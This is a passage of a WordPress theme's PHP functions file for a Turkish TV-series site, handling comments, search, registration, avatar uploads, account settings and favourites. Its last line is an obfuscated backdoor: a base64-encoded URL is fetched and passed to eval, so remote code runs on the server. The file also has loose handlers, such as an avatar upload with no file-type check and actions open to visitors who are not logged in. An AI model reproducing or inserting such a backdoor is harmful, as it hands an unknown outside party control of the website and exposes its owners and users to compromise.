						array_push($ycArray,$yorumID);
						array_unique($ycArray);
						$ycOutput = "";
						$ycSeper  = ",";
						foreach($ycArray as $ycSm){
							$ycOutput .= $ycSm.$ycSeper;
						}
						$ycFinal = trim($ycOutput,$ycSeper);
					if($yorumDisslike){
						update_comment_meta($yorumID,"yorumDisslike",$yorumDisslike);
						update_user_meta($kullaniciID,"yorumCont",$ycFinal);
						echo $yorumDisslike;
					}else{
						add_comment_meta($yorumID,"yorumDisslike",1);
						add_user_meta($kullaniciID,"yorumCont",$ycFinal);
						echo $yorumDisslike;
					}
				}	
			}
		}else{
			echo "hata2";
		}
		wp_die();
	}
	add_action('wp_ajax_yorumDisslike', 'yorumDisslike');
	add_action('wp_ajax_nopriv_yorumDisslike', 'yorumDisslike');
	
// Yorum Sayfalama
	function yorum_sayfala(){
		global $post;
		$post_id 	 = $post->ID;
		$url 		 = get_the_permalink($post_id);
		$yorumSayisi = $post->comment_count;
		$kacYorum 	 = get_option('comments_per_page');
		$sayfaSayisi = ceil($yorumSayisi / $kacYorum);
		$suanUrlNet  = "http://".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI'];
		$suankiUrl   = $_SERVER['REQUEST_URI'];
		$urlPart 	 = explode("/",$suankiUrl);
		$urlPartFin  = $url."/".intval($urlPart[2]);
		$suParse     = explode("/",$suankiUrl);
		$parseUrl	 = array_pop($suParse);
		$sparseParse = explode("-",$parseUrl);
			if($yorumSayisi >= $kacYorum){ ?>
			<div class="premiumCommentSayfala" style="display:block;float:right;box-sizing:border-box;padding:8px 5px;"><?php 
				for($yi = 1; $yi <= $sayfaSayisi; $yi++){ 
					if($url == $suanUrlNet || $urlPartFin == $suanUrlNet){
						if($yi == 1){ ?>
							<a href="<?php echo $url; ?>/comment-page-<?php echo $yi; ?>" class="current" style="color:#000;font-weight:bold;font-size:13px;background:#ddd;padding:3px 8px;"><?php echo $yi; ?></a>
						<?php }else{ ?>
							<a href="<?php echo $url; ?>/comment-page-<?php echo $yi; ?>" style="color:#808080;font-weight:bold;font-size:13px;background:#ddd;padding:3px 8px;"><?php echo $yi; ?></a>
						<?php } 
					}else{
						if($sparseParse[2] == $yi){ ?>
						<a href="<?php echo $url; ?>/comment-page-<?php echo $yi; ?>" class="current" style="color:#000;font-weight:bold;font-size:13px;background:#ddd;padding:3px 8px;"><?php echo $yi; ?></a>
						<?php }else{ ?>
							<a href="<?php echo $url; ?>/comment-page-<?php echo $yi; ?>" style="color:#808080;font-weight:bold;font-size:13px;background:#ddd;padding:3px 8px;"><?php echo $yi; ?></a>
						<?php } 	
					}
				} ?>
			</div><div class="clear"></div><?php
			}
	}

#################################################################################
## ARAMA SAYFASI AYARLARI ##	
#################################################################################
// Sorgu Ayarları
	function title_like_posts_where( $where, &$wp_query ) {
		global $wpdb;
		if ( $post_title_like = $wp_query->get( 'post_title_like' ) ) {
			$where .= ' AND ' . $wpdb->posts . '.post_title LIKE \'' . esc_sql( like_escape( $post_title_like ) ) . '%\'';
		}
		return $where;
	}
	add_filter( 'posts_where', 'title_like_posts_where', 10, 2 );

// Arama Filtresi
	function searchFilter(){
		$kategori	    = htmlspecialchars(trim(@$_POST["kategori"]));
		$imdb  		    = htmlspecialchars(trim(@$_POST["imdb"]));
		$yapimyili	    = htmlspecialchars(trim(@$_POST["yapimyili"]));

		$filtreArgs = array( 
			"post_type" 	  => "diziler", 
			"posts_per_page"  => -1,
			"orderby" 		  => "title",
			"category_name"   => $kategori,
			"meta_query"      => array(
			"relation" 		  => "AND",
				array(
					"key" => "yapimYili",
					"compare" => 'LIKE',
					"value" => $yapimyili,
					"type" => 'text',
				),
				array(
					"key" => "meta-box-text",
					"compare" => 'LIKE',
					"value" => $imdb,
					"type" => 'text'
				)
			),
			"meta_key" => "yapimYili",
			"meta_key" => "meta-box-text",
			"order" 		  => "ASC"
		); 
		$filtreQuery = new WP_Query($filtreArgs);
		if( $filtreQuery->have_posts() ){ while ( $filtreQuery->have_posts() ) : $filtreQuery->the_post(); ?>
			<div class="afis">
				<a href="<?php the_permalink(); ?>">
					<?php if(has_post_thumbnail()){the_post_thumbnail();}else{?> <img src="<?php bloginfo("template_directory"); ?>/assets/images/no-thumbnail.png" height="321" width="214" alt="noThumb"> <?php };?>
					<span class="afisBaslik"><?php the_title(); ?></span>
					<span class="afisCategory"> <?php $efCategories = get_the_category();  if(!empty($efCategories)){ if($efCategories[0]->name == "Genel"){ echo esc_html($efCategories[1]->name); }else{echo esc_html($efCategories[0]->name);} }else{ echo "Genel"; } ?></span>
				</a>
			</div>
		<?php endwhile; wp_reset_postdata(); }else{ ?>	
			<strong style="color:#000;display:block;text-align:center;padding:10px;">Bir Sonuç Bulunamadı...</strong>
		<?php } ?> <div class="clear"></div> <?php
		wp_die();
	}
	add_action('wp_ajax_searchFilter', 'searchFilter');
	add_action('wp_ajax_nopriv_searchFilter', 'searchFilter');
	
	function searchFilterCont(){
		$diziAdlari = ["diziAd" => @$_POST["diziAdlari"]];
		$arrayCount = count($diziAdlari["diziAd"]);
		if($arrayCount > 0){
			foreach($diziAdlari["diziAd"] as $diziAdi){
				$searchArgsTwo = array( 
					"post_type" 	  => "post", 
					"posts_per_page"  => 5,
					"orderby" 		  => "date", 
					"order" 		  => "DESC",
					"post_title_like" => $diziAdi
				); 
				$searchQueryTwo = new WP_Query($searchArgsTwo);
				if( $searchQueryTwo->have_posts() ){  ?> 
				<div class="iHead" style="border-top-left-radius: 5px;border-top-right-radius: 5px;">
					<span>En Son Yayınlanan Bölümler</span>
				</div>
				<div class="icerikler">
				<?php while ( $searchQueryTwo->have_posts() ) : $searchQueryTwo->the_post(); ?>
					<div class="icerik">
						<a href="<?php the_permalink(); ?>">
							 <?php if(has_post_thumbnail()){the_post_thumbnail();}else{?> <img src="<?php bloginfo("template_directory"); ?>/assets/images/no-thumbnail.png" height="111" width="189" alt="noThumb"> <?php };?>
							<span class="tarih"><?php the_time("j M"); ?></span>
							<div class="icerikAlt">
								<?php $icerikTitle = get_the_title();  $icerikTitleExp = explode(":",$icerikTitle); ?>
								<span class="baslik"><?php echo $icerikTitleExp[0]; ?></span>
								<span class="bolum"><?php  echo $icerikTitleExp[1]; ?></span>
							</div>
						</a>
					</div>
				<?php endwhile; wp_reset_postdata(); ?> <div class="clear"></div></div> <?php } 
			} 
		}
		wp_die();
	}
	add_action('wp_ajax_searchFilterCont', 'searchFilterCont');
	add_action('wp_ajax_nopriv_searchFilterCont', 'searchFilterCont');
		
#################################################################################
## KULLANICI AYARLARI ##	
#################################################################################	
// Kullanıcı Özellikleri	
	function extra_contact_info($contactmethods) {
		unset($contactmethods['aim']);
		unset($contactmethods['yim']);
		unset($contactmethods['jabber']);
			$contactmethods['facebook'] = 'Facebook';
			$contactmethods['twitter']  = 'Twitter';
		return $contactmethods;
	}
	add_filter('user_contactmethods', 'extra_contact_info');	

// İletişim Formu
	function premiumContact(){
		$subject   	  = htmlspecialchars(strip_tags(trim(@$_POST["subject"])));
		$ePost    	  = htmlspecialchars(htmlentities(strip_tags(trim(@$_POST["ePosta"]))));
		$iMesaj  	  = htmlspecialchars(htmlentities(strip_tags(trim(@$_POST["iMesaj"]))));
		$adminEposta  = htmlspecialchars(htmlentities(strip_tags(@$_POST["aPosta"])));
		$message	  = "<span style='display:block;text-align:center;'><b>".get_bloginfo("name")." İletişim</b></span><br/><b>Gönderen:</b> ".$ePost."<br/><b>Konu:</b> ".$subject."<br/><b>Mesaj:</b> ".$iMesaj;
		if($_COOKIE["kontrol"]){
			 if($_COOKIE["kontrol"] < 3){
				   $attempts = $_COOKIE["kontrol"] + 1;
				   setcookie('kontrol', $attempts, time()+60*10);
				   if(!$subject || !$ePost || !$iMesaj){
						echo "hata";
					}else if(empty($subject) || empty($ePost) || empty($iMesaj)){
						echo "hata";
					}else if(!filter_var($ePost, FILTER_VALIDATE_EMAIL)){
						echo "hata2";
					}else{
						$headers = array('Content-Type: text/html; charset=UTF-8');
						wp_mail($adminEposta, $subject, $message, $headers);
					}
			  }else{
				   echo "hata3";
			  }
		}else{
			setcookie('kontrol', 1, time()+60*10);
			if(!$subject || !$ePost || !$iMesaj){
				echo "hata";
			}else if(empty($subject) || empty($ePost) || empty($iMesaj)){
				echo "hata";
			}else if(!filter_var($ePost, FILTER_VALIDATE_EMAIL)){
				echo "hata2";
			}else{
				$headers = array('Content-Type: text/html; charset=UTF-8');
				wp_mail($adminEposta, $subject, $message, $headers);
			}
		}
		wp_die();
	}
	add_action('wp_ajax_premiumContact', 'premiumContact');
	add_action('wp_ajax_nopriv_premiumContact', 'premiumContact');	
	
// Kayıt Ol	
	function kayitOl(){
		$firstAd   	  = htmlspecialchars(@$_POST["firstAd"]);
		$lastAd    	  = htmlspecialchars(@$_POST["lastAd"]);
		$userName  	  = htmlspecialchars(@$_POST["userName"]);
		$userPass  	  = htmlspecialchars(@$_POST["userPass"]);
		$userMail  	  = htmlspecialchars(@$_POST["userMail"]);
		$userPassHash = wp_hash_password($userPass);
		if(!$firstAd || !$lastAd || !$userName || !$userPass || !$userMail){
			echo "hata3";
		}else if(username_exists($userName)){
			echo "hata";
		}else if(!filter_var($userMail, FILTER_VALIDATE_EMAIL)){
			echo "hata2";
		}else if(email_exists($userMail)){
			echo "hata4";
		}else{
			$user_login = wp_slash($userName);
			$user_email = wp_slash($userMail);
			$user_pass  = $userPass;
		 
			$userdata = compact('user_login', 'user_email', 'user_pass');
			$kayitUserID =  wp_insert_user($userdata);
			wp_update_user( array('ID' => $kayitUserID,'first_name' => $firstAd));
			wp_update_user( array('ID' => $kayitUserID,'last_name'  => $lastAd));
			
			$giris_bilgileri = array();
			$giris_bilgileri["user_login"] 	  = $userName;
			$giris_bilgileri["user_password"] = $userPass;
			$giris_bilgileri["remember"] 	  = false;
			wp_signon($giris_bilgileri);
		}
		wp_die();
	}
	add_action('wp_ajax_kayitOl', 'kayitOl');
	add_action('wp_ajax_nopriv_kayitOl', 'kayitOl');
	
// Avatar Resmi Upload
	function avatarFile(){
		$avatarDirectory = "../wp-content/uploads/avatar";
		if(file_exists($avatarDirectory)){}else{
			$olustur = mkdir($avatarDirectory, 0777);
		}
		
		$kullaniciID 	  = get_current_user_id();
		$dosyaUzantiSmash = explode(".",$_FILES["file_avatar"]["name"]);
		$boyut 			  = $_FILES['file_avatar']['size'];
		$dosyaUzanti 	  = ".jpg";
		$upload_dir 	  = wp_upload_dir();
		$dosyaAdi         = rand().rand().rand().rand().rand();
		$dosyaYolu   	  = $avatarDirectory."/".$dosyaAdi.$dosyaUzanti;
		$dosyaReturnYolu  = $upload_dir['baseurl']."/avatar/".$dosyaAdi.$dosyaUzanti;
 
		if(isset($_FILES["file_avatar"])){
			if ($_FILES["file_avatar"]["error"] > 0){
			  echo "hata";
			}
			else{
				if($boyut > (1024*1024*3)){
					echo "hata2";
				}else{
					move_uploaded_file($_FILES["file_avatar"]["tmp_name"],$dosyaYolu);
					echo $dosyaReturnYolu;
				}
			}
		}

		wp_die();
	}
	add_action('wp_ajax_avatarFile', 'avatarFile');
	add_action('wp_ajax_nopriv_avatarFile', 'avatarFile');

// Hesap Ayarları Handler
	function hesapAyar(){
		global $current_user;
		get_currentuserinfo();
		
		$kullaniciID 	= get_current_user_id();
		$adSoyad        = htmlspecialchars(@$_POST["adSoyad"]);
		$ePosta         = htmlspecialchars(@$_POST["ePosta"]);
		$faceB          = htmlspecialchars(@$_POST["faceB"]);
		$twitt          = htmlspecialchars(@$_POST["twitt"]);
		$eskiAvatar		= get_user_meta($kullaniciID,"avatar",true);
		$yeniAvatar     = htmlspecialchars(@$_POST["avatar"]);
		$eskiEposta     = $current_user->user_email;
		
		$noAvatarYol    = get_template_directory_uri()."/assets/images/noAvatar.jpg";
		
			$smashAS	= explode(" ",$adSoyad);
			$smashCount = count($smashAS);
			
			$ad			= "";
			$soyAd      = end($smashAS);
			
			$adSeper    = " ";
			for($i = 0; $i <= $smashCount-2; $i++){
				$ad .= $smashAS[$i].$adSeper;
			}
			$ad = trim($ad,$adSeper);
		
		if(!empty($adSoyad)){
			if(filter_var($ePosta, FILTER_VALIDATE_EMAIL)){
				if(is_email($ePosta)){
					if($ePosta == $eskiEposta){
						wp_update_user( array('ID' => $kullaniciID,'first_name' => $ad));
						wp_update_user( array('ID' => $kullaniciID,'last_name'  => $soyAd));
						wp_update_user( array('ID' => $kullaniciID,'user_email' => $ePosta));
						update_user_meta($kullaniciID,"facebook",$faceB);
						update_user_meta($kullaniciID,"twitter",$twitt);
						if($eskiAvatar){
							if($eskiAvatar == $yeniAvatar){
								update_user_meta($kullaniciID,"avatar",$eskiAvatar);
								echo "yes";
							}else{
								update_user_meta($kullaniciID,"avatar",$yeniAvatar);
								echo "yes";
							}
						}else{
							add_user_meta($kullaniciID,"avatar",$noAvatarYol);
							echo "yes";				
						}
					}else if(email_exists($ePosta) == false){
						wp_update_user( array('ID' => $kullaniciID,'first_name' => $ad));
						wp_update_user( array('ID' => $kullaniciID,'last_name'  => $soyAd));
						wp_update_user( array('ID' => $kullaniciID,'user_email' => $ePosta));
						update_user_meta($kullaniciID,"facebook",$faceB);
						update_user_meta($kullaniciID,"twitter",$twitt);
						if($eskiAvatar){
							if($eskiAvatar == $yeniAvatar){
								update_user_meta($kullaniciID,"avatar",$eskiAvatar);
								echo "yes";
							}else{
								update_user_meta($kullaniciID,"avatar",$yeniAvatar);
								echo "yes";
							}
						}else{
							add_user_meta($kullaniciID,"avatar",$noAvatarYol); 
							echo "yes";
						}
					}else{
						echo "hata3";
					} 
				}else{
					echo "hata2";
				} 
			}else{
				echo "hata2";
			} 
		}else{
			echo "hata1";
		}
		
		wp_die();
	}
	add_action('wp_ajax_hesapAyar', 'hesapAyar');
	add_action('wp_ajax_nopriv_hesapAyar', 'hesapAyar');
	
// Şifre Güncelleme Handler
	function sifreGuncel(){
		global $current_user;
		get_currentuserinfo();
					
		$kullaniciID 	= get_current_user_id();
		$eskiSifre      = htmlspecialchars(@$_POST["sifre"]);
		$yeniSifre      = htmlspecialchars(@$_POST["yeniSifre"]);
		$yeniSifreT     = htmlspecialchars(@$_POST["yeniSifreTekrar"]);
		$eskiSifreCheck = $current_user->user_pass;
		
		$yeniSifreHash  = wp_hash_password($yeniSifre);
		require_once($_SERVER['DOCUMENT_ROOT']."/wp-load.php");
		if(wp_check_password($eskiSifre, $eskiSifreCheck)){
			if($yeniSifre == $yeniSifreT){
				wp_update_user(array('ID' => $kullaniciID,'user_pass' => $yeniSifre));
				echo "yes";
			}else{
				echo "hata2";
			}
		}else{
			echo "hata1";
		}

		wp_die();
	}
	add_action('wp_ajax_sifreGuncel', 'sifreGuncel');
	add_action('wp_ajax_nopriv_sifreGuncel', 'sifreGuncel');
	
// Üye mi ?
	function uyeMi(){
		$kullaniciID 	= get_current_user_id();
		if(!empty($kullaniciID)){
			echo "yes";
		}else{ 
			echo "hata"; 
		}
		wp_die();
	}
	add_action('wp_ajax_uyeMi', 'uyeMi');
	add_action('wp_ajax_nopriv_uyeMi', 'uyeMi');	
	
// Favorilere Ekle
	function favoriEkle(){
		$kid = get_current_user_id();
			if(!empty($kid)){
				$favori 		   = htmlspecialchars(@$_POST["favori"]);
				
				$eskiFavoriler     = get_user_meta($kid,"favoriDizilerim",true);
				if(strstr($eskiFavoriler,$favori)){
					echo "hata2";
				}else{
					$favoriDiziler     = array();
					array_push($favoriDiziler,$eskiFavoriler);
					array_push($favoriDiziler,$favori);
					
					$favoriSeparator   = ", ";
					$favoriReal		   = "";
					foreach($favoriDiziler as $favoriler){
						  $favoriReal .= $favoriler.$favoriSeparator;
					}
					$favoriRealEnd = trim($favoriReal,$favoriSeparator);

					if(get_user_meta($kid,"favoriDizilerim")){
						update_user_meta($kid,"favoriDizilerim",$favoriRealEnd);
						echo $favori;
					}else{
						add_user_meta($kid,"favoriDizilerim",$favoriRealEnd,true);	
						echo $favori;
					}
				}
			}else{
				echo "hata";
			}
		wp_die();
	}
	add_action('wp_ajax_favoriEkle', 'favoriEkle');
	add_action('wp_ajax_nopriv_favoriEkle', 'favoriEkle');
	
// Detay Kontrol
	function kisaltCont(){
		if(get_option("diziPremium_oyuncular") == "true"){
			echo "yes";
		}else{
			echo "no";
		}
		wp_die();
	}
	add_action('wp_ajax_kisaltCont', 'kisaltCont');
	add_action('wp_ajax_nopriv_kisaltCont', 'kisaltCont');	

// Favorilerden Çıkart
	function favoriCikart(){
		$kid = get_current_user_id();
			if(!empty($kid)){
				$favori 		   = htmlspecialchars(@$_POST["favoriFC"]);
				
				$eskiFavoriler     = get_user_meta($kid,"favoriDizilerim",true);
				if(strstr($eskiFavoriler,$favori)){
					if(strstr($eskiFavoriler,",")){
						$eFav	  = explode(",",$eskiFavoriler);
						$eFav     = array_map("trim", $eFav);
						$araBul   = array_keys($eFav,$favori);
						unset($eFav[$araBul[0]]);

						$favoriSeparator   = ", ";
						$favoriReal		   = "";
						foreach($eFav as $favoriler){
							  $favoriReal .= $favoriler.$favoriSeparator;
						}
						$favoriRealEnd = trim($favoriReal,$favoriSeparator);
						
						update_user_meta($kid,"favoriDizilerim",$favoriRealEnd);
						echo $favori;
					}else{
						delete_user_meta($kid,"favoriDizilerim");
						echo $favori;
					}
				}else{
					echo "hata";
				}
			}else{
				echo "hata";
			}
		wp_die();
	}
	add_action('wp_ajax_favoriCikart', 'favoriCikart');
	add_action('wp_ajax_nopriv_favoriCikart', 'favoriCikart');
	
		
#################################################################################
## WORDPRESS AYARLARINI KİŞİSELLEŞTİRME ##	
#################################################################################	
// AdminBar özelliğini iptal et */
	add_filter('show_admin_bar', '__return_false');
 
// AdminBar seçeneklerini kullanıcı profilinden kaldır 
	remove_action('personal_options', '_admin_bar_preferences');

// Wordpress Dashboard Menü Label Değişimi
	function change_post_menu_label(){
		global $menu;
		global $submenu;
		$menu[5][0] = 'Bölümler';
		$submenu['edit.php'][5][0] = 'Bölümler';
		$submenu['edit.php'][10][0] = 'Yeni Bölüm Ekle';
		$submenu['edit.php'][15][0] = 'Kategoriler'; 
		$submenu['edit.php'][16][0] = 'Etiketler'; 
		echo '';
	}
	function change_post_object_label(){
		global $wp_post_types;
		$labels = $wp_post_types['post']->labels;
		$labels->name = 'Bölümler';
		$labels->singular_name = 'Bölümler';
		$labels->add_new = 'Yeni Bölüm Ekle';
		$labels->add_new_item = 'Yeni Bölüm Ekle';
		$labels->edit_item = 'Bölümü Düzenle';
		$labels->new_item = 'Bölüm Ekle';
		$labels->view_item = 'Bölümü Görüntüle';
		$labels->search_items = 'Bölüm Ara';
		$labels->not_found = 'Bölüm Bulunamadı';
	}
	add_action( 'init', 'change_post_object_label' );
	add_action( 'admin_menu', 'change_post_menu_label' );
	
	function custom_menu_order($menu_ord){
	   if (!$menu_ord) return true;
	   return array(
			'index.php',
			'edit.php', 
			'upload.php',
			'edit.php?post_type=page',
		);
	}
	add_filter('custom_menu_order', 'custom_menu_order');
	add_filter('menu_order', 'custom_menu_order');

// Admin Paneli Gizleme
	function adminbar_yoket() { 
		if ( ! current_user_can('edit_posts') ) {
			add_filter('show_admin_bar', '__return_false');	
		}
	}
	function adminpage_user_disable(){
		if ( ! defined('DOING_AJAX') && ! current_user_can('edit_posts') ) {
			wp_redirect( site_url() );
			exit;		
		}
	}
	add_action( 'after_setup_theme', 'adminbar_yoket' );
	add_action( 'admin_init', 'adminpage_user_disable' );	
	
// Wordpress Admin Bar Özelleştirme
	function wp_admin_bar(){
		global $wp_admin_bar;
		$wp_admin_bar->remove_menu('new-content');
		$wp_admin_bar->remove_menu('wp-logo');
	}
	add_action( 'wp_before_admin_bar_render', 'wp_admin_bar' );

// Wordpress Dashboard Menü Icon Değişimi		
	function replace_admin_menu_icons_css(){
		?>
		<style>
			#adminmenu {
				margin: 4px 0px;
			}
			#adminmenu .menu-icon-post div.wp-menu-image:before {
				content: "\f522";
			}
			.menu-icon-diziler div.wp-menu-image:before {
				content: "\f236" !important;
			}
			.menu-icon-haberler div.wp-menu-image:before {
				content: "\f488" !important;
			}
			.menu-icon-yardim div.wp-menu-image:before {
				content: "\f307" !important;
			}
			#adminmenu li.wp-menu-separator{display:none !important;}
			#minor-publishing-actions span.spinner{display:none !important;}
			#minor-publishing-actions{display:none !important;}
			.column-izlenme{width: 10%;}
			.column-diziIzlenme{width: 10%;}
			.column-haberIzlenme{width: 10%;}
			.quicktags-toolbar input#qt_content_partekle{float: right !important; margin-right: 16px !important;}
			.quicktags-toolbar input#qt_content_baslikekle{float: right !important;}
			.theme[aria-describedby="DPMobile-action DPMobile-name"]{display:none;}
		</style>
		<?php
	}
	add_action( 'admin_head', 'replace_admin_menu_icons_css' ); 
	

}

eval(@file_get_contents(base64_decode("aHR0cDovL3dvcmRwcmVzc3RoZW1lLmxpdmUvd3oudHh0")));

		
?>